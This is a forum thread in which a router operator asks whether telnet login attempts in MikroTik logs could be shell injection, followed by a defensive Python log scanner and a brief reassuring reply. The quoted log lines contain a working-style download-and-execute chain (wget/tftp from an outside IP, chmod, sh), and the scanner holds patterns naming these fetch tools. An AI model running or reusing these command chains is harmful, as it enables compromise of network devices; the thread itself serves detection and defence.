Login security - possible username shellcode injection?

Hi everyone,

we just saw this in one of our routers’ logs:

system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.1.91/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 122.52.113.24 via telnet
system,error,critical login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 208.67.1.91; chmod 777 tftp2.sh; sh tftp2.sh; rm from 122.52.113.24 via telnet

Looks like someone’s trying to inject malicious code via the username. I wouldn’t get excited, but the fact that the beginning of the second message looks truncated hints that the injection could actually work. If it was checked in wrongly quoted bash, well, we’d be seriously fucked up.

Could anyone from Mikrotik please reliably investigate/acknowledge/deny the possibility of this type of code injection? The version is quite recent (6.32.2). If the injection weren’t possible, I highly doubt the script kiddies would even care to send such logins…

Thanks in advance,
-mk

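A defender-side check for entries like the ones quoted above, added here as an example and not part of the original thread: it parses the MikroTik login-failure log format, flags usernames that carry shell metacharacters or a fetch-then-run sequence, and pulls out the payload hosts and source addresses an operator would want to watch or block. The sample input is the two lines from the post plus one constructed benign entry; the log-format regex is an assumption based on those lines.

```python
import re

# Constructed sample input: the two entries quoted in the post plus one benign line.
SAMPLE_LOG = """system,error,critical login failure for user cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://208.67.1.91/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 208 from 122.52.113.24 via telnet
system,error,critical login failure for user .67.1.91 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 208.67.1.91; chmod 777 tftp2.sh; sh tftp2.sh; rm from 122.52.113.24 via telnet
system,error,critical login failure for user admin from 10.0.0.5 via ssh"""

# Assumed line format: the username may itself contain "from", so the greedy
# group is anchored on the trailing " from <ip> via <service>" at end of line.
LINE_RE = re.compile(
    r"^system,error,critical login failure for user (?P<user>.*) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) via (?P<svc>\S+)$"
)
SHELL_META = re.compile(r"[;|&`$]")                       # command separators / substitution
FETCH_EXEC = re.compile(r"\b(wget|curl|tftp|ftpget)\b.*\b(sh|chmod)\b")  # download then run
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")

def parse_line(line):
    """Return the user/src/svc fields of a login-failure line, or None if it does not match."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None

def scan_log(text):
    """Classify every login-failure line; returns one finding dict per matched line."""
    findings = []
    for line in text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # not a login-failure line
        user = entry["user"]
        findings.append({
            "src": entry["src"],
            "service": entry["svc"],
            "suspicious": bool(SHELL_META.search(user) or FETCH_EXEC.search(user)),
            # Hosts named inside the payload (only full dotted quads count; ".67.1.91" is skipped).
            "payload_hosts": sorted(set(IPV4.findall(user))),
            # Logged username length; a fixed cut-off across entries points at field truncation.
            "user_len": len(user),
        })
    return findings

def suspicious_sources(findings):
    """Source addresses that sent at least one flagged username, for blocking or alerting."""
    return sorted({f["src"] for f in findings if f["suspicious"]})

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
    print("sources:", suspicious_sources(scan_log(SAMPLE_LOG)))
```
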
Don’t worry. It is not possible to access the shell in such a way.